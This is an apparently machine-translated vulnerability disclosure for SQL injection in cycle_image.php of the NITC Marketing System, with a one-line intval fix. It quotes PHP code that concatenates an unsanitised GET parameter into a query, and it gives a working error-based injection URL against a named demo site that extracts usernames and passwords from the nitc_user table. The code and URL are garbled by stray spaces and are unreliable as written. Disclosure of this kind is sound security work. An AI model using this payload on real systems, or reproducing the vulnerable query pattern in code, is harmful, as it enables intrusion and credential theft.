SQL injection vulnerability in NITC Marketing System

SQL injection vulnerability in NITC Marketing System

Injection appears in cycle_image.php

 

<? Phpdefine ("IN_LOCK", true); define ("INIT_NO_USERS", true); define ("INIT_NO_SMARTY", true); require (". /includes/init. php "); header (" Content-type: text/xml; charset = UTF-8 "); header (" Expires: Fri, 14 Mar 1980 20:53:00 GMT "); header ("Last-Modified :". gmdate ("D, d m y h: I: s "). "GMT"); header ("Pragma: no-cache"); $ s = explode ("^", trim ($ _ GET ['language']); // use the ^ separator to get the array $ secho "<? Xml version = \ "1.0 \" encoding = \ "UTF-8 \"?> <Bcaster> "; $ SQL =" select * from ". $ site-> table ("ad "). "where your age_id = ". $ s [0]. "and category = '". $ s [1]. "'and type = 0 and state = 0 order by sort_order desc"; // $ s [0] without single quotation marks, ignore gpc injection $ res = $ db-> getAllCached ($ SQL); foreach ($ res as $ row) {if (is_file ("upload/adfile /". $ row ['file']) {echo "<item item_url = \"". $ _ CFG ['weburl']. "/upload/adfile /". $ row ['file']. "\" link = \"". $ row ['url']. "\"/> ";}} echo "</Bcaster>";?>

Official Website test:

Http://demo.cnnitc.com/cycle_image.php? Language = 1% 20AND % 20 (SELECT % 201% 20 FROM (SELECT % 20 COUNT (*), CONCAT (floor (rand (0) * 2 ), (select % 20 concat (user_name, 0x23, password) % 20 from % 20nitc_user % 20 limit % 200,1) x % 20 FROM % 20INFORMATION_SCHEMA.tables % 20 GROUP % 20BY % 20x) a )#
 

 

Solution:

Language receives an array to traverse each value:

$ Language = intval ($ _ GET ['language']);